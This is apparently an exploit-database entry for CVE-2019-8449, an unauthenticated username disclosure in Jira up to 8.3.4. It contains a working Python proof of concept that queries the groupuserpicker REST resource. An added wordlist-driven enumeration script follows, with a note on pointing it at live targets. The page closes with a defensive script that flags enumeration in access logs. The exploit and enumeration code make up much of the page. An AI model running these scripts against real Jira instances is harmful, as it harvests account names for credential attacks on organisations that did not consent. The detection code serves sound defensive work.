Jira 8.3.4 - Information Disclosure (Username Enumeration)

CVE-2019-8449: the /rest/api/latest/groupuserpicker REST resource in Jira 2.1 through 8.3.4 answers unauthenticated requests, so anyone who can reach the instance can search for usernames by prefix. The proof of concept below sends a single anonymous GET to that resource and prints the JSON result.





				
# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
# Date: 2019-09-11
# Exploit Author: Mufeed VH
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Version: 8.3.4
# Tested on: Pop!_OS 19.10
# CVE : CVE-2019-8449

# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796

#!/usr/bin/env python3
__author__ = "Mufeed VH (@mufeedvh)"

import os
import sys

import requests


class CVE_2019_8449:
    """Queries the unauthenticated groupuserpicker REST resource, which on
    affected Jira versions returns the usernames matching the search string."""

    def ask_for_domain(self):
        # Prompt in a loop rather than recursing: the original recursed on empty
        # input, then the outer call overwrote self.url with its own empty domain.
        domain = ""
        while domain == "":
            domain = input("[>] Enter the domain of Jira instance: => ").strip()
            if domain == "":
                print("\n[-] ERROR: domain is required\n")
        self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)

    def ask_for_query(self):
        self.query = ""
        while self.query == "":
            self.query = input("[>] Enter search query: [required] (Example: admin) => ").strip()
            if self.query == "":
                print("\n[-] ERROR: The query parameter is required\n")

    def exploit(self):
        self.ask_for_domain()
        self.ask_for_query()
        # Optional parameters of the groupuserpicker resource; blank answers are
        # dropped below so Jira applies its own defaults (shown in parentheses).
        maxResults = input("\n[>] Enter the number of maximum results to fetch: (50) => ")
        showAvatar = input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
        fieldId = input("\n[>] Enter the fieldId to fetch: => ")
        projectId = input("\n[>] Enter the projectId to fetch: => ")
        issueTypeId = input("\n[>] Enter the issueTypeId to fetch: => ")
        avatarSize = input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
        caseInsensitive = input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
        excludeConnectAddons = input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")

        params = {
            'query': self.query,
            'maxResults': maxResults,
            'showAvatar': showAvatar,
            'fieldId': fieldId,
            'projectId': projectId,
            'issueTypeId': issueTypeId,
            'avatarSize': avatarSize,
            'caseInsensitive': caseInsensitive,
            'excludeConnectAddons': excludeConnectAddons,
        }
        params = {key: value.strip() for key, value in params.items() if value.strip() != ""}

        # No credentials are sent: the disclosure is that this works anonymously.
        send_it = requests.get(url=self.url, params=params, timeout=15)
        try:
            response = send_it.json()
        except ValueError:
            print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
            print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
            print("[-] INFO: Try visiting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
            sys.exit(1)

        print("\n<========== RESPONSE ==========>\n")
        print(response)
        print("\n<==============================>\n")


if __name__ == '__main__':
    os.system('cls' if os.name == 'nt' else 'clear')
    print('''
================================================
|                                              |
| CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
| Proof of Concept By: Mufeed VH [@mufeedvh]   |
|                                              |
================================================
''')
    CVE_2019_8449().exploit()
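The PoC above fires one query and dumps the raw JSON. In practice an assessor wants to drive the same resource with a wordlist, merge the usernames out of each response, and stop as soon as the server refuses anonymous access. The block below is an added example (not the PoC author's code) that does that with the HTTP transport passed in as a callable, so the logic runs offline against a constructed stand-in for a vulnerable instance. The host name jira.example.internal, the wordlist and the directory of fake users are assumptions; the response shape (users.users[].name, groups.groups) follows the documented groupuserpicker JSON.

```python
"""Wordlist-driven username enumeration via Jira's groupuserpicker resource.

Added example for CVE-2019-8449; the transport is injected so it runs offline.
"""
import json
from urllib.parse import parse_qs, urlencode, urlparse

ENDPOINT = "/rest/api/latest/groupuserpicker"


def build_url(base_url, query, max_results=50, case_insensitive=True):
    """URL for one search. Only the parameters the enumeration needs are sent;
    Jira applies its own defaults for the rest."""
    params = {
        "query": query,
        "maxResults": max_results,
        "caseInsensitive": "true" if case_insensitive else "false",
    }
    return base_url.rstrip("/") + ENDPOINT + "?" + urlencode(params)


def extract_usernames(body):
    """Return the 'name' of every user record in a groupuserpicker response,
    or an empty list when the body is not the expected JSON."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    users = data.get("users", {}) if isinstance(data, dict) else {}
    return [u["name"] for u in users.get("users", []) if "name" in u]


def classify_response(status, body):
    """Triage one anonymous probe without guessing the patch level:
    'disclosing'    - 200 with user records: usernames are leaking
    'no_match'      - 200 with the expected JSON but no users for this prefix
    'auth_required' - 401/403: anonymous access to the resource is refused
    'unexpected'    - anything else (login redirect, WAF page, ...)"""
    if status in (401, 403):
        return "auth_required"
    if status != 200:
        return "unexpected"
    if extract_usernames(body):
        return "disclosing"
    try:
        data = json.loads(body)
    except ValueError:
        return "unexpected"
    return "no_match" if isinstance(data, dict) and "users" in data else "unexpected"


def enumerate_users(base_url, wordlist, fetch, max_results=50):
    """Query each wordlist entry as a prefix and merge the usernames returned.
    fetch(url) -> (status_code, body_text). Stops at the first refusal, since
    further anonymous probes would only add noise to the target's logs."""
    found = set()
    verdicts = {}
    for word in wordlist:
        status, body = fetch(build_url(base_url, word, max_results))
        verdict = classify_response(status, body)
        verdicts[word] = verdict
        if verdict == "auth_required":
            break
        found.update(extract_usernames(body))
    return sorted(found), verdicts


def _constructed_jira(url):
    """Constructed stand-in for a vulnerable 8.3.4 instance (not real traffic):
    three prefixes match somebody, everything else matches nobody."""
    query = parse_qs(urlparse(url).query).get("query", [""])[0]
    directory = {"admin": ["admin", "administrator"], "al": ["alice"], "bo": ["bob"]}
    users = [{"name": n, "key": n, "displayName": n.title()} for n in directory.get(query, [])]
    body = {
        "users": {"users": users, "total": len(users),
                  "header": "Showing {0} of {0} matching users".format(len(users))},
        "groups": {"groups": [], "total": 0, "header": "Showing 0 of 0 matching groups"},
    }
    return 200, json.dumps(body)


if __name__ == "__main__":
    names, verdicts = enumerate_users("https://jira.example.internal",
                                      ["admin", "al", "zz"], _constructed_jira)
    print(names, verdicts)
```

Against a live target, pass a real transport such as `lambda u: (lambda r: (r.status_code, r.text))(requests.get(u, timeout=15))`; the verdict per word tells you whether a 200 with no users means "nobody matched" or the resource never answered as expected.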

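On the defending side, the same resource is easy to watch for: a legitimate user typing into the picker sends a few growing prefixes, while an enumeration run sends many unrelated ones from one client. The block below is an added example (not part of the original page) that flags such clients in combined-format access logs, as a reverse proxy in front of Jira might write them. The log lines, client addresses and threshold are constructed; only 200 responses are counted, because those are the only ones that can have leaked usernames.

```python
"""Detect groupuserpicker username enumeration in access logs.

Added example; the sample log lines below are constructed, not real traffic.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Combined log format: ip ident user [ts] "METHOD target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
PICKER_PATH = "/rest/api/latest/groupuserpicker"


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def picker_queries(lines):
    """Map client IP -> set of distinct 'query' values sent to the picker
    resource that were answered 200. A context path (/jira/...) is tolerated."""
    per_ip = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["status"] != "200":
            continue
        parsed = urlparse(rec["target"])
        if not parsed.path.endswith(PICKER_PATH):
            continue
        query = parse_qs(parsed.query).get("query", [""])[0]
        per_ip[rec["ip"]].add(query)
    return per_ip


def flag_enumerators(lines, threshold=5):
    """Return {ip: distinct_query_count} for clients at or above the threshold."""
    return {ip: len(qs) for ip, qs in picker_queries(lines).items() if len(qs) >= threshold}


def _line(ip, target, status, ua="python-requests/2.22.0"):
    """Build one constructed combined-format log line."""
    return '{} - - [11/Sep/2019:10:15:32 +0000] "GET {} HTTP/1.1" {} 412 "-" "{}"'.format(
        ip, target, status, ua)


# Constructed sample: one wordlist run, one human using the picker, one client
# probing an instance that refuses anonymous access (403), one unrelated 401.
SAMPLE_LOG = (
    [_line("203.0.113.7", "{}?query={}&maxResults=50".format(PICKER_PATH, w), 200)
     for w in ["admin", "root", "test", "jira", "svc", "backup"]]
    + [_line("198.51.100.2", "/jira{}?query={}&showAvatar=true".format(PICKER_PATH, w), 200, "Mozilla/5.0")
       for w in ["ali", "alic"]]
    + [_line("192.0.2.9", "{}?query={}".format(PICKER_PATH, w), 403) for w in ["a", "b", "c", "d", "e"]]
    + [_line("192.0.2.9", "/rest/api/2/myself", 401)]
)


if __name__ == "__main__":
    print(flag_enumerators(SAMPLE_LOG))
```

The threshold is a starting point, not a rule: tune it against your own baseline of picker traffic, and treat any 200 to this resource from an unauthenticated session on a version before 8.4.0 as the finding in itself.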


